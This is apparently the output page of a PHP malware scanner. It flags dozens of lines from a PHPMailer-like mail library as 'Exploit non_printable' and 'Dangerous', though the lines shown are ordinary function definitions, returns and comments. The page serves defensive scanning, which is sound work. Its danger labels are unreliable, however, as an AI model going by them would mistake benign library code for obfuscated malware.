<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2238</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2248</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2250</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2284</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2295</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2462</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2479</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2489</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned by openssl contains both headers </span><span style="color: #007700">and </span><span style="color: #0000BB">body</span><span style="color: #007700">, </span><span style="color: #0000BB">so need to split them up</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2691</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the start of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2703</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">, </span><span style="color: #0000BB">$charSet</span><span style="color: #007700">, </span><span style="color: #0000BB">$contentType</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2728</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the end of a message boundary</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2733</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">endBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2735</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$boundary </span><span style="color: #007700">. </span><span style="color: #DD0000">'--' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setMessageType</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2770</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">headerLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$name </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">a formatted mail line</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">textLine</span><span style="color: #007700">(</span><span style="color: #0000BB">$value</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2783</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2800</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2840</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2856</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2858</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2981</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2996</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3010</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3025</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3050</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3089</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3097</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
